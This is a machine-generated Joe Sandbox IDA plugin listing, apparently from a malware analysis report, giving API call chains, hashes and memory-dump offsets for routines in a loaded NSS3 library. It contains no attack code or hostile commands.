                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 284873373-0
                                                                                                                                                                                                                                                      • Opcode ID: 8fdcb042ca7fb036501548219a7c619bccd2f4dbfb66e4421845949d360cc1da
                                                                                                                                                                                                                                                      • Instruction ID: 309150fa1b146b8eeaf236e39f514e33369126adde77b58c847618ee8ad5478e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8fdcb042ca7fb036501548219a7c619bccd2f4dbfb66e4421845949d360cc1da
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E9114F75A05A109BDB00AF78D848A6ABBF4FF45714F024969DC88DBB00E730E894CBD5
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C505F17,?,?,?,?,?,?,?,?,6C50AAD4), ref: 6C51AC94
                                                                                                                                                                                                                                                      • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C505F17,?,?,?,?,?,?,?,?,6C50AAD4), ref: 6C51ACA6
                                                                                                                                                                                                                                                      • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C50AAD4), ref: 6C51ACC0
                                                                                                                                                                                                                                                      • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C50AAD4), ref: 6C51ACDB
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: free$DestroyFreeK11_Monitor
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3989322779-0
                                                                                                                                                                                                                                                      • Opcode ID: 886c5378e4aa5a089ec91b951c1f4344bdedcc92562c247964bab445427e38e9
                                                                                                                                                                                                                                                      • Instruction ID: 37b0786d2b99cb777a9f7974d010ef11f5e1495eacdcdca06f6d4a54b81b65c2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 886c5378e4aa5a089ec91b951c1f4344bdedcc92562c247964bab445427e38e9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 350129B1601B029BEB51DF2ADD08A57B7E8BF10699B104839E85AD7E00E731F159CBD1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CERT_DestroyCertificate.NSS3(?), ref: 6C481DFB
                                                                                                                                                                                                                                                        • Part of subcall function 6C4795B0: TlsGetValue.KERNEL32(00000000,?,6C4900D2,00000000), ref: 6C4795D2
                                                                                                                                                                                                                                                        • Part of subcall function 6C4795B0: EnterCriticalSection.KERNEL32(?,?,?,6C4900D2,00000000), ref: 6C4795E7
                                                                                                                                                                                                                                                        • Part of subcall function 6C4795B0: PR_Unlock.NSS3(?,?,?,?,6C4900D2,00000000), ref: 6C479605
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3 ref: 6C481E09
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390AB
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390C9
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: EnterCriticalSection.KERNEL32 ref: 6C5390E5
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C539116
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: LeaveCriticalSection.KERNEL32 ref: 6C53913F
                                                                                                                                                                                                                                                        • Part of subcall function 6C47E190: PR_EnterMonitor.NSS3(?,?,6C47E175), ref: 6C47E19C
                                                                                                                                                                                                                                                        • Part of subcall function 6C47E190: PR_EnterMonitor.NSS3(6C47E175), ref: 6C47E1AA
                                                                                                                                                                                                                                                        • Part of subcall function 6C47E190: PR_ExitMonitor.NSS3 ref: 6C47E208
                                                                                                                                                                                                                                                        • Part of subcall function 6C47E190: PL_HashTableRemove.NSS3(?), ref: 6C47E219
                                                                                                                                                                                                                                                        • Part of subcall function 6C47E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C47E231
                                                                                                                                                                                                                                                        • Part of subcall function 6C47E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C47E249
                                                                                                                                                                                                                                                        • Part of subcall function 6C47E190: PR_ExitMonitor.NSS3 ref: 6C47E257
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C481E37
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3 ref: 6C481E4A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Monitor$Enter$Value$CriticalExitSection$Arena_FreeUtil$CertificateDestroyErrorHashLeaveRemoveTableUnlock
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 499896158-0
                                                                                                                                                                                                                                                      • Opcode ID: 0b875d0f7ad5c6b5e71ec85cedad180ae2591dc886f583af286206e8fd6451bb
                                                                                                                                                                                                                                                      • Instruction ID: a7a339a4fe273742be84fc699e15f25661cc4023b086f69c5b76d7eba986049f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0b875d0f7ad5c6b5e71ec85cedad180ae2591dc886f583af286206e8fd6451bb
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D01D471B01250D7EB10CA29EC40FA67764AB8174DF110137E93997B51E731E814CBE5
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C481D75
                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C481D89
                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(00000010), ref: 6C481D9C
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C481DB8
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Alloc_Util$Errorfree
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 939066016-0
                                                                                                                                                                                                                                                      • Opcode ID: c962cf9e4db3d344d956f4efd2456a7df7017447a54bade2f3767e013d253615
                                                                                                                                                                                                                                                      • Instruction ID: d96e6a444756003a2ceeb5a335778b600e4efa1f962c050b786dbbdd3f522cc3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c962cf9e4db3d344d956f4efd2456a7df7017447a54bade2f3767e013d253615
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 61F0F9B260321057FF10DF199C41F877698DB81799F11063BDD299BF41D761F80582E1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6C5D2F88,6C500660,00000020,00000000,?,?,6C502C3D,?,00000000,00000000,?,6C502A28,00000060,00000001), ref: 6C500860
                                                                                                                                                                                                                                                        • Part of subcall function 6C3F4C70: TlsGetValue.KERNEL32(?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4C97
                                                                                                                                                                                                                                                        • Part of subcall function 6C3F4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CB0
                                                                                                                                                                                                                                                        • Part of subcall function 6C3F4C70: PR_Unlock.NSS3(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CC9
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(00000020,00000000,?,?,6C502C3D,?,00000000,00000000,?,6C502A28,00000060,00000001), ref: 6C500874
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(00000001), ref: 6C500884
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C5008A3
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalEnterSectionUnlockValue$CallOnce
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2502187247-0
                                                                                                                                                                                                                                                      • Opcode ID: e1e459967a62f6fb86ac04ecd43c5b19dee775e323f5d6518604d5fe486be404
                                                                                                                                                                                                                                                      • Instruction ID: fb1afb20aee20782f39640c4915f9dbffe3bd620b3dac81fd70977822274f37a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e1e459967a62f6fb86ac04ecd43c5b19dee775e323f5d6518604d5fe486be404
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DD012075F00345ABEB012F25DC459557734FF9731DF0A0566EC0895E01EB21A85487DA
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C479003,?), ref: 6C4CFD91
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0BE0: malloc.MOZGLUE(6C4C8D2D,?,00000000,?), ref: 6C4D0BF8
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0BE0: TlsGetValue.KERNEL32(6C4C8D2D,?,00000000,?), ref: 6C4D0C15
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(A4686C4D,?), ref: 6C4CFDA2
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,12D068C3,A4686C4D,?,?), ref: 6C4CFDC4
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,?), ref: 6C4CFDD1
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Alloc_Util$Valuefreemallocmemcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2335489644-0
                                                                                                                                                                                                                                                      • Opcode ID: f8ddf9dadac80ee83b5128f8e6a580f02effb0565d2670c52ad726afbddddc2b
                                                                                                                                                                                                                                                      • Instruction ID: b159cc6bc64904850b851daaf08d87b681b4f4f20b6774381fdacfa487cc01e2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8ddf9dadac80ee83b5128f8e6a580f02effb0565d2670c52ad726afbddddc2b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 75F0C8B97022029BFB049B55DC90D177B68EF84799B148074ED0A8BB11E721E815C7F2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalDeleteSectionfree
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2988086103-0
                                                                                                                                                                                                                                                      • Opcode ID: 2e6c1cbef8b8112a5bb759d67e403d0bbbd943e86aa7072167d3ee6a644ceaf6
                                                                                                                                                                                                                                                      • Instruction ID: fa08770f15aa3320f578dab9c4c8310cdd2965014aaa963566d5d1bec089dd16
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e6c1cbef8b8112a5bb759d67e403d0bbbd943e86aa7072167d3ee6a644ceaf6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 89E06576700A089FCA10EFA9DC48C8B77BCEE492743160529E691C7700D332F905CBE5
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • sqlite3_value_text.NSS3 ref: 6C469E1F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4213C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6C3F2352,?,00000000,?,?), ref: 6C421413
                                                                                                                                                                                                                                                        • Part of subcall function 6C4213C0: memcpy.VCRUNTIME140(00000000,R#?l,00000002,?,?,?,?,6C3F2352,?,00000000,?,?), ref: 6C4214C0
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • LIKE or GLOB pattern too complex, xrefs: 6C46A006
                                                                                                                                                                                                                                                      • ESCAPE expression must be a single character, xrefs: 6C469F78
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: memcpysqlite3_value_textstrlen
                                                                                                                                                                                                                                                      • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                                                                                                                                                                                                                      • API String ID: 2453365862-264706735
                                                                                                                                                                                                                                                      • Opcode ID: 9b84b059de969d1bc32182b0c18308f8d073173ec133eb5c1b2aac694563f089
                                                                                                                                                                                                                                                      • Instruction ID: 7d19a83c14f88cd0d4b50a8bbde62d55eecf76556bdb4b22734f570e9796106a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9b84b059de969d1bc32182b0c18308f8d073173ec133eb5c1b2aac694563f089
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C811970A046518BD704CF26C480FA9B7F2AF95319F198659D8A48BFC9D773D847C790
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFD037,00000000), ref: 6C4E59C8
                                                                                                                                                                                                                                                        • Part of subcall function 6C4E7EE0: PR_SetError.NSS3(00000000,00000000,00000002,?,?), ref: 6C4E7F30
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFD0AE,00000000), ref: 6C4E59E9
                                                                                                                                                                                                                                                        • Part of subcall function 6C4EAA40: PR_SetError.NSS3(00000000,00000000,00000008,?,?), ref: 6C4EAAA2
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Error
                                                                                                                                                                                                                                                      • String ID: nXl
                                                                                                                                                                                                                                                      • API String ID: 2619118453-2538165799
                                                                                                                                                                                                                                                      • Opcode ID: e1bd1071422012d81e6f4f6615cbe8badc6a25988ed1359614f1323c998b4022
                                                                                                                                                                                                                                                      • Instruction ID: a36d0762691404302dfa3af20d4dab6dea458ec58737c445554d8883df001155
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e1bd1071422012d81e6f4f6615cbe8badc6a25988ed1359614f1323c998b4022
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DD41A4716083019FD710DF14DC85F9B73A8AB4832AF564629FD599B782E770E908CBE1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C4C4D57
                                                                                                                                                                                                                                                      • PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C4C4DE6
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorR_snprintf
                                                                                                                                                                                                                                                      • String ID: %d.%d
                                                                                                                                                                                                                                                      • API String ID: 2298970422-3954714993
                                                                                                                                                                                                                                                      • Opcode ID: c04b2178c31a52a406666a7f31570d4bffa828acf978a8da86b7ccd2f1a6e6a5
                                                                                                                                                                                                                                                      • Instruction ID: bce491581265a025431ac02413924f763edbf379fa0a1b2c1a4bb7a2a0b011fa
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c04b2178c31a52a406666a7f31570d4bffa828acf978a8da86b7ccd2f1a6e6a5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF31D6B6E042186BEB10EBA19C01FFF7768EF80349F050429ED159B791EB319905CBE6
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SECOID_FindOIDByTag_Util.NSS3('8Nl,00000000,00000000,?,?,6C4E3827,?,00000000), ref: 6C4E4D0A
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D08B4
                                                                                                                                                                                                                                                      • SECITEM_ItemsAreEqual_Util.NSS3(00000000,00000000,00000000), ref: 6C4E4D22
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C471A3E,00000048,00000054), ref: 6C4CFD56
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Equal_ErrorFindItemsTag_memcmp
                                                                                                                                                                                                                                                      • String ID: '8Nl
                                                                                                                                                                                                                                                      • API String ID: 1521942269-472363851
APIs
• PR_GetUniqueIdentity.NSS3(SSL), ref: 6C50AF78
  • Part of subcall function 6C46ACC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C46ACE2
  • Part of subcall function 6C46ACC0: malloc.MOZGLUE(00000001), ref: 6C46ACEC
  • Part of subcall function 6C46ACC0: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C46AD02
  • Part of subcall function 6C46ACC0: TlsGetValue.KERNEL32 ref: 6C46AD3C
  • Part of subcall function 6C46ACC0: calloc.MOZGLUE(00000001,?), ref: 6C46AD8C
  • Part of subcall function 6C46ACC0: PR_Unlock.NSS3 ref: 6C46ADC0
  • Part of subcall function 6C46ACC0: PR_Unlock.NSS3 ref: 6C46AE8C
  • Part of subcall function 6C46ACC0: free.MOZGLUE(?), ref: 6C46AEAB
• memcpy.VCRUNTIME140(6C5D3084,6C5D02AC,00000090), ref: 6C50AF94
Strings
Memory Dump Source
• Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
Similarity
• API ID: Unlock$IdentityUniqueValuecallocfreemallocmemcpystrcpystrlen
• String ID: SSL
• API String ID: 2424436289-2135378647
APIs
• PR_GetPageSize.NSS3(6C460936,FFFFE8AE,?,6C3F16B7,00000000,?,6C460936,00000000,?,6C3F204A), ref: 6C460F1B
  • Part of subcall function 6C461370: GetSystemInfo.KERNEL32(?,?,?,?,6C460936,?,6C460F20,6C460936,FFFFE8AE,?,6C3F16B7,00000000,?,6C460936,00000000), ref: 6C46138F
• PR_NewLogModule.NSS3(clock,6C460936,FFFFE8AE,?,6C3F16B7,00000000,?,6C460936,00000000,?,6C3F204A), ref: 6C460F25
  • Part of subcall function 6C461110: calloc.MOZGLUE(00000001,0000000C,?,?,?,?,?,?,?,?,?,?,6C460936,00000001,00000040), ref: 6C461130
  • Part of subcall function 6C461110: strdup.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,6C460936,00000001,00000040), ref: 6C461142
  • Part of subcall function 6C461110: PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES,?,?,?,?,?,?,?,?,?,?,?,?,?,6C460936,00000001), ref: 6C461167
Strings
Similarity
• API ID: InfoModulePageSecureSizeSystemcallocstrdup
• String ID: clock
• API String ID: 536403800-3195780754
APIs
Similarity
• API ID: Value$calloc
• String ID:
• API String ID: 3339632435-0
APIs
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C472AF5,?,?,?,?,?,6C470A1B,00000000), ref: 6C4D0F1A
• malloc.MOZGLUE(00000001), ref: 6C4D0F30
• memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C4D0F42
• TlsGetValue.KERNEL32 ref: 6C4D0F5B
Similarity
• API ID: Valuemallocmemcpystrlen
• String ID:
• API String ID: 2332725481-0
APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: free
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1294909896-0